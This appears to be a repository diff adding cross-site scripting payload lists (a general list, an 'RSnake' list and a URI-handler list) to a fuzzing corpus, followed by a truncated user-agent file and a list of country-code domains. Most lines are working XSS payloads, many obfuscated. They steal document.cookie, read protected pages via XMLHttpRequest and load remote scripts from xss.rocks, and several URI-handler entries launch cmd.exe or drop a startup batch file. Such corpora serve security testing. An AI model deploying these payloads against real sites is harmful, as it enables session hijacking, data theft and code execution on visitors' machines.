<<SCRIPT>alert("XSS");//<</SCRIPT>
<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>
<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>
<BASE HREF="javascript:alert('XSS');//">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<body onLoad="alert('XSS');"
<body onunload="javascript:alert('XSS');">
<body/onload=&lt;!--&gt;&#10alert(1)>
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?
<div onmouseover='alert&lpar;1&rpar;'>DIV</div>
<div/onmouseover='alert(1)'> style="x:">
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ?
<form><button formaction=javascript&colon;alert(1)>CLICKME
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ?
<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script>
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
<iframe src=http://xss.rocks/scriptlet.html <
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<iframe/onreadystatechange=alert(1)
<iframe/src \/\/onload = prompt(1)
<IMG DYNSRC=\"javascript:alert('XSS')\">
<IMG onmouseover="alert('xxs')">
<img src ?itworksonchrome?\/onerror = alert(1)???
<IMG SRC= onmouseover="alert('xxs')">
<IMG SRC=" &#14; javascript:alert('XSS');">
<img src="/" =_=" title="onerror='prompt(1)'">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&amp;#x09;ascript:alert('XSS');">
<IMG SRC="jav&amp;#x0A;ascript:alert('XSS');">
<IMG SRC="jav&amp;#x0D;ascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"
<img src="javascript:alert('XSS')">
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<img src=`xx:xx`onerror=alert(1)>
<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #
<IMG SRC=java%00script:alert(\"XSS\")>
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<input type="text" value=``<div/onmouseover='alert(1)'>X</div>
<input value=<><iframe/src=javascript:confirm(1)
<math><a xlink:href="//jsfiddle.net/t846h/">click
<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>?
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?
<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?
<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
<script for=document event=onreadystatechange>getElementById('safe123').click()</script>
<script itworksinallbrowsers>/*<script* */alert(1)</script ?
<script src="data:text/javascript,alert(1)"></script>
<SCRIPT SRC="http:&#47;&#47;xss.rocks/xss.jpg"></SCRIPT>
<SCRIPT SRC=http://xss.rocks/xss.js?< B >
<script x> alert(1) </script 1=2
<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
<SCRIPT/SRC="http:&#47;&#47;xss.rocks/xss.js"></SCRIPT>
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ?
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script ????????????
<SCRIPT\s" != "<SCRIPT/XSS\s';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script>
<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script>
<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>
<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>
<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>
<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>#
<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script>+-+-1-+-+alert(1)</script>
<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>
<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>
<script>alert(document.head.childNodes[3].text)</script>
<script>alert(document.head.innerHTML.substr(146,20));</script>
<script>alert('XSS');</script>
<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>
<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>
<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>
<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>
<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#
'<script>window.onload=function(){document.forms[0].message.value='1';}</script>
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>
<svg contentScriptType=text/vbs><script>MsgBox+1
<svg/onload=alert(1)
<svg><script ?>alert(1)
<svg><script onlypossibleinopera:-)> alert(1)
<svg><script>//&NewLine;confirm(1);</script </svg>
<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea>
<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
<var onmouseover="prompt(1)">On Mouse Over</var>?
<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23
alert
alert&lpar;1&rpar;
alert(1)
alert\\`1\\`
alert`1`
<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>
http://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
http://www.<script>alert(1)</script .com
https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
javascript:alert%28/xss/%29
javascript:alert(1)
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
x”</title><img src%3dx onerror%3dalert(1)>

78
attack/xss/xss-rsnake.txt Normal file
View file

@ -0,0 +1,78 @@
<SCRIPT>alert('XSS');</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC=" &#14; javascript:alert('XSS');">
<IMG%0aSRC%0a=%0a"%0aj%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0at%0a:%0aa%0al%0ae%0ar%0at%0a(%0a'%0aX%0aS%0aS%0a'%0a)%0a"%0a>
<IMG SRC=java%00script:alert(\"XSS\")>
<SCR%00IPT>alert(\"XSS\")</SCR%00IPT>
<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT>
<SCRIPT SRC=http://xss.rocks/xss.js?<B>
<IMG SRC="javascript:alert('XSS')"
<SCRIPT>a=/XSS/
\";alert('XSS');//
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LAYER SRC="http://xss.rocks/scriptlet.html"></LAYER>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://xss.rocks/xss.css">
<STYLE>@import'http://xss.rocks/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://xss.rocks/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}</STYLE>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
exp/*<XSS STYLE='no\xss:noxss("*//*");
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
getURL("javascript:alert('XSS')")
a="get";
<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');">
<XML SRC="http:/xss.rocks/xsstest.xml" ID=I></XML>
<HTML><BODY>
<SCRIPT SRC="http://xss.rocks/xss.jpg"></SCRIPT>
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.rocks/xss.js></SCRIPT>'"-->
<? echo('<SCR)';
<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://xss.rocks/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://xss.rocks/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://xss.rocks/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://xss.rocks/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="xss.rocks/xss.js"></SCRIPT>

6
attack/xss/xss-uri.txt Normal file
View file

@ -0,0 +1,6 @@
aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"
navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
firefoxurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)

2463
discovery/UserAgent/UserAgents.txt Normal file
View file

File diff suppressed because it is too large Load diff

257
discovery/dns/CcTLD.txt Normal file
View file

@ -0,0 +1,257 @@
ac
ad
ae
af
ag
ai
al
am
an
ao
aq
ar
as
at
au
aw
ax
az
ba
bb
bd
be
bf
bg
bh
bi
bj
bl
bm
bn
bo
bq
br
bs
bt
bv
bw
by
bz
ca
cc
cd
cf
cg
ch
ci
ck
cl
cm
cn
co
cr
cu
